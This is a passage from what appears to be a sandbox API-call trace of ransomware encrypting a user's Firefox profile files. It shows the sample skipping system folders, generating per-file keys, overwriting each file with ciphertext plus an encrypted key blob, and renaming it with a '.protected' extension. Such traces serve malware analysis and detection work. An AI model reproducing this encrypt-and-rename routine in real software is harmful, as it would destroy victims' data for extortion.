lpFindFileData=0x295e560) returned 1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Windows") returned -1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Program Files") returned -1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Program Files (x86)") returned -1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="$Recycle.bin") returned 1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="System Volume Information") returned -1 [0090.542] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.542] StrStrIW (lpFirst="content-prefs.sqlite", lpSrch=".protected") returned 0x0 [0090.542] lstrcmpW (lpString1="content-prefs.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.542] StrStrW (lpFirst="content-prefs.sqlite", lpSrch=".txt") returned 0x0 [0090.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.542] StrStrW (lpFirst="content-prefs.sqlite", lpSrch=".rar") returned 0x0 [0090.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.543] StrStrW (lpFirst="content-prefs.sqlite", lpSrch=".zip") returned 0x0 [0090.543] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.547] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.547] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.547] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.547] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.547] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.547] CloseHandle (hObject=0x154) returned 1 [0090.547] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.protected") returned 122 [0090.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.protected")) returned 1 [0090.548] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Windows") returned -1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Program Files") returned -1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Program Files (x86)") returned -1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="$Recycle.bin") returned 1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="System Volume Information") returned -1 [0090.548] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.548] StrStrIW (lpFirst="cookies.sqlite", lpSrch=".protected") returned 0x0 [0090.548] lstrcmpW (lpString1="cookies.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.548] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.548] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.549] StrStrW (lpFirst="cookies.sqlite", lpSrch=".txt") returned 0x0 [0090.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.549] StrStrW (lpFirst="cookies.sqlite", lpSrch=".rar") returned 0x0 [0090.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.549] StrStrW (lpFirst="cookies.sqlite", lpSrch=".zip") returned 0x0 [0090.549] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.561] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.562] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.562] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.562] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.580] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.580] CloseHandle (hObject=0x154) returned 1 [0090.580] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.protected") returned 116 [0090.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.protected")) returned 1 [0090.581] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="Windows") returned -1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="Program Files") returned -1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="Program Files (x86)") returned -1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="$Recycle.bin") returned 1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="System Volume Information") returned -1 [0090.581] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.581] StrStrIW (lpFirst="downloads.sqlite", lpSrch=".protected") returned 0x0 [0090.581] lstrcmpW (lpString1="downloads.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.581] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.581] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.583] StrStrW (lpFirst="downloads.sqlite", lpSrch=".txt") returned 0x0 [0090.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.583] StrStrW (lpFirst="downloads.sqlite", lpSrch=".rar") returned 0x0 [0090.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.583] StrStrW (lpFirst="downloads.sqlite", lpSrch=".zip") returned 0x0 [0090.583] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.598] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.598] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.599] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.599] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.599] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.599] CloseHandle (hObject=0x154) returned 1 [0090.599] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.protected") returned 118 [0090.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.protected")) returned 1 [0090.600] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="Windows") returned -1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="Program Files") returned -1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="Program Files (x86)") returned -1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="$Recycle.bin") returned 1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="System Volume Information") returned -1 [0090.600] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.600] StrStrIW (lpFirst="extensions.ini", lpSrch=".protected") returned 0x0 [0090.600] lstrcmpW (lpString1="extensions.ini", lpString2="RESTORE_FILES.txt") returned -1 [0090.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.602] StrStrW (lpFirst="extensions.ini", lpSrch=".txt") returned 0x0 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.602] StrStrW (lpFirst="extensions.ini", lpSrch=".rar") returned 0x0 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.602] StrStrW (lpFirst="extensions.ini", lpSrch=".zip") returned 0x0 [0090.602] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x8d, lpOverlapped=0x0) returned 1 [0090.603] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.603] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x8d, lpOverlapped=0x0) returned 1 [0090.603] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.603] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.603] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.603] CloseHandle (hObject=0x154) returned 1 [0090.603] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.protected") returned 116 [0090.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.protected")) returned 1 [0090.605] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="Windows") returned -1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="Program Files") returned -1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="Program Files (x86)") returned -1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="$Recycle.bin") returned 1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="System Volume Information") returned -1 [0090.605] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.605] StrStrIW (lpFirst="extensions.sqlite", lpSrch=".protected") returned 0x0 [0090.605] lstrcmpW (lpString1="extensions.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.605] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.605] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.606] StrStrW (lpFirst="extensions.sqlite", lpSrch=".txt") returned 0x0 [0090.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.606] StrStrW (lpFirst="extensions.sqlite", lpSrch=".rar") returned 0x0 [0090.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.606] StrStrW (lpFirst="extensions.sqlite", lpSrch=".zip") returned 0x0 [0090.606] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.620] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.621] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.621] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.621] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.622] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.622] CloseHandle (hObject=0x154) returned 1 [0090.622] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.protected") returned 119 [0090.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.protected")) returned 1 [0090.623] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="Windows") returned -1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="Program Files") returned -1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="Program Files (x86)") returned -1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="$Recycle.bin") returned 1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="System Volume Information") returned -1 [0090.623] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 101 [0090.623] lstrcmpW (lpString1="indexedDB", lpString2=".") returned 1 [0090.624] lstrcmpW (lpString1="indexedDB", lpString2="..") returned 1 [0090.624] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*") returned 103 [0090.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.624] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.625] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.625] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\.") returned 103 [0090.625] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.625] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.625] lstrcmpiW 